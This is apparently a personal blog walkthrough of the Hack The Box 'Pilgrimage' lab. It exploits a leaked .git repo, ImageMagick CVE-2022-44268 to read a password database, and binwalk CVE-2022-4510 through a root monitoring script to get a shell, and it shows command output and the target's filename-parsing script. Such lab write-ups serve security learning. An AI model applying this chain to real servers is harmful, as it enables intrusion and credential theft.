Post

Pilgrimage - HTB Writeup

Pilgrimage - HTB Writeup

Enumeration

I started this one out with an nmap scan and a little dirbusting with ffuf, but unfortunately didn't find anything out of the ordinary. I checked out the website and found it was just a simple tool to shrink images. Because the site allowed user uploads I tried attacking it by uploading a php webshell but there was a filter. I tried a bunch of different ways to get around this but to no avail.

I got lost for a while until I decided to try something different, and I checked if the webiste was a git repo. I checked if .git existed on the server and I got a 403, perfect. From there I had to figure out how to recover the files. Apparently a tool called gitdump exists for this exact purpose. I used it and was able to recover the source code which contained a binary for imagemagick which was used by the website to shrink images.

ndit@pop-os ~/tools/gitdump/output master $ ls -la
		total 26972
		drwxrwxr-x 5 endit endit     4096 Jul  3 14:55 .
		drwxrwxr-x 4 endit endit     4096 Jul  3 14:54 ..
		drwxrwxr-x 6 endit endit     4096 Jul  3 14:55 .git
		drwxrwxr-x 6 endit endit     4096 Jul  3 14:55 assets
		-rwxrwxr-x 1 endit endit     5538 Jul  3 14:55 dashboard.php
		-rwxrwxr-x 1 endit endit     9250 Jul  3 14:55 index.php
		-rwxrwxr-x 1 endit endit     6822 Jul  3 14:55 login.php
		-rwxrwxr-x 1 endit endit       98 Jul  3 14:55 logout.php
		-rwxrwxr-x 1 endit endit 27555008 Jul  3 14:55 magick
		-rwxrwxr-x 1 endit endit     6836 Jul  3 14:55 register.php
		drwxrwxr-x 4 endit endit     4096 Jul  3 14:55 vendor

I found the version of the binary, googled it, and found that there's an arbitrary file read vulnerability CVE-2022-44268.

endit@pop-os ~/tools/gitdump/output master $ ./magick -version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org

By looking through the source I discovered the website uses an sqlite database
which was stored at /var/db/pilgrimage. So I found a POC for the vulnerability and used it to created a malicious image to read that DB.

endit@pop-os ~/Desktop/CVE-2022-44268 master $ cargo run "/var/db/pilgrimage"
		Finished dev [unoptimized + debuginfo] target(s) in 0.00s
		 Running `target/debug/cve-2022-44268 /var/db/pilgrimage`

I uploaded the malicious image and lo' and behold the processed image contained the binary data of the DB.

endit@pop-os ~/Desktop $ identify -verbose 64a463aa01888.png 
		Image:
		  Filename: 64a463aa01888.png
		  Format: PNG (Portable Network Graphics)
		  Mime type: image/png
		  -----------------------------------------------------------

		   20480
		53514c69746520666f726d61742033001000010100402020000000c80000000500000000
		000000000000000400000004000000000000000000000001000000000000000000000000
		0000000000000000000000000000000000000000000000c8002e4b910d0ff800040eba00
		0f650fcd0eba0f3800000000000000000000000000000000000000000000000000000000
		000000000000000000000000000000000000000000000000000000000000000000000000
		000000000000000000000000000000000000000000000000000000000000000000000000
		000000000000000000000000000000000000000000000000000000000000000000000000
		-----------------------------------------------------------------------
		363461343565626230616434632e706e670231036909687474703a2f2f70696c6772696d
		6167652e6874622f736872756e6b2f363461343565613536353031312e706e67

			signature: d02a8da86fec6ef80c209c8437c76cf8fbecb6528cd7ba95ef93eecc52a171c7
		  Artifacts:
			filename: 64a463aa01888.png
			verbose: true
		  Tainted: False
		  Filesize: 1954B
		  Number pixels: 10000
		  Pixels per second: 24.6713MB
		  User time: 0.000u
		  Elapsed time: 0:01.000
		  Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org

I wrote the binary data to new a file and put into an online sqlite viewer.

The db contained two tables: images and users. Users contained an entry for a user called emily and a password. With this I was able to ssh in as emily and get the flag.

Privilege Escalation

After searching around for a bit I found an interesting process:

root         733  0.0  0.0   6816  2380 ?        S    Jul04   0:00 /bin/bash /usr/sbin/malwarescan.sh

I checked out the script malwarescan.sh and found this:

blacklist=("Executable script" "Microsoft executable")
	/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
		filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
		binout="$(/usr/local/bin/binwalk -e "$filename")"
			for banned in "${blacklist[@]}"; do
			if [[ "$binout" == *"$banned"* ]]; then
				/usr/bin/rm "$filename"
				break
			fi
		done
	done

It appears to watch the directory where shrunk images are stored to check if they are "malware". It does this using a program called binwalk. The version of binwalk being used happened to be run as root and vulnerable to CVE-2022-4510. The script uses inotifywait which watches a directory for changes and executes code whenever there's a change. To exploit this I found a tool to generate a malicious image to give me a shell. The script in use here is a little strange, for whatever reason the filename is modified to just grab the file extension, but only when it follows the text "CREATE ". For example if a file named "CREATE .png" is moved into shrunk/ then the script will try to run ".png" through binwalk. So I named my malicious image .png and moved it into shrunk/, after that I just created a file named "CREATE .png" and boom I got a shell.


This post is licensed under CC BY 4.0 by the author.